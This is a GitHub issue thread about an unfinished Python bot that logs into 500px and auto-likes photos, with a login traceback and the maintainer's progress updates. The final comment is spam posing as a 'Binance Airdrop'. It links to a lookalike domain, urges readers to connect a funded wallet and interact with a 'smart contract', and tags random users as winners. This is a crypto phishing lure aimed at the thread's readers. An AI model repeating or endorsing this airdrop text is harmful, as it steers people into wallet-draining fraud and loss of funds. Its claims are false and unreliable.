### ISSUE TITLE
Script doesn’t work for me

### ISSUE THREAD

**Issue by Maximapple** [TheJoin95/500px-bot#1]
I'm seeing the following error when I try to execute it:

```
Maxims-MacBook-Pro:500px-bot-master-2 maxim$ python run.py 
None
error page
Traceback (most recent call last):
  File "run.py", line 425, in <module>
    print doLogin()
  File "run.py", line 77, in doLogin
    configValues["user_data"] = responseLoginPost["user"]
KeyError: 'user'
```

Am I doing something wrong?

**Comment by TheJoin95** [comment]
Hi @Maximapple, the script is not yet finished.
I need to work on, but all the single functions are already working.

I will update this repo with all the new features that I'm working on, in these days.
Please, wathing this repo for news and feel free to contribute.

Thank you

**Comment by Maximapple** [comment]
Hey @TheJoin95,

Alright, thanks for letting me know. I hope this issue will be fixed in the next few days. :)

**Comment by Maximapple** [comment]
Hey,

When are you going to update it?

**Comment by TheJoin95** [comment]
@Maximapple In the last couple of month I was too busy (job & life) to continue to work on this project.

Now, I'm trying to figure out some important features like an easy to use configuration and management of all the comments, searchs and fav.

I will update this repo as much as I can in the next couple of weeks.
Ty

**Comment by Maximapple** [comment]
Hey @TheJoin95 

How's it going? Is this script working a little bit now? I'd love to use it.

**Comment by TheJoin95** [comment]
@Maximapple Yeah, I made some progress and more will come soon.
Now, the script can search and like, but I need to add some limit rate check and other features.

By the way, right now the script is working with search and like. To use it, you need to edit the init.py and add more a search with: `mainBot.search("term to search and like randomly")`

Stay tuned for others update, ty.

**Comment by Maximapple** [comment]
Maybe you can implement a feature that likes the pictures that appear on https://500px.com/fresh?

**Comment by TheJoin95** [comment]
Hi @Maximapple, yeah I've already do that, but I need to understand the flow of the search algorithm.
Anyway I'm still coding on this project so I will make some update in the near future :dancer:

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @alexchenzl, @Anthony-Li, @taevel02, @lifezq, @quanblackhat, @d-roak, @lnshi
